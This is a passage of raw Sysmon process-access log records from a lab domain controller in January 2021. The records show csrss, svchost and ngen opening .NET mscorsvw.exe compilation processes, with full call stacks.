4e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006009Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:19.171{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-912B-6005-CA01-00000000A301}4792C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006008Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:19.171{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912B-6005-CA01-00000000A301}4792C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006007Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:19.125{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912B-6005-C901-00000000A301}3448C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006006Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:19.125{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-912B-6005-C901-00000000A301}3448C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006005Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:19.125{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912B-6005-C901-00000000A301}3448C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006004Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:19.000{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912B-6005-C801-00000000A301}4640C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006003Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:19.000{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-912B-6005-C801-00000000A301}4640C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006002Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:19.000{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912B-6005-C801-00000000A301}4640C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006039Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:20.984{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-912C-6005-D401-00000000A301}1404C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006038Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:20.984{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912C-6005-D401-00000000A301}1404C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006037Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:20.812{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912C-6005-D301-00000000A301}804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006036Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:20.812{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-912C-6005-D301-00000000A301}804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006035Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:20.812{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912C-6005-D301-00000000A301}804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006034Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:20.765{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912C-6005-D201-00000000A301}1200C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006033Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:20.765{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-912C-6005-D201-00000000A301}1200C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006032Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:20.765{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912C-6005-D201-00000000A301}1200C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006031Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:20.703{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912C-6005-D101-00000000A301}2512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006030Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:20.687{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-912C-6005-D101-00000000A301}2512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006029Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:20.687{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912C-6005-D101-00000000A301}2512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006028Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:20.359{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912C-6005-D001-00000000A301}3924C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006027Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:20.343{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-912C-6005-D001-00000000A301}3924C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006026Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:20.343{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912C-6005-D001-00000000A301}3924C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006085Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.984{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912D-6005-E301-00000000A301}4888C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006084Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 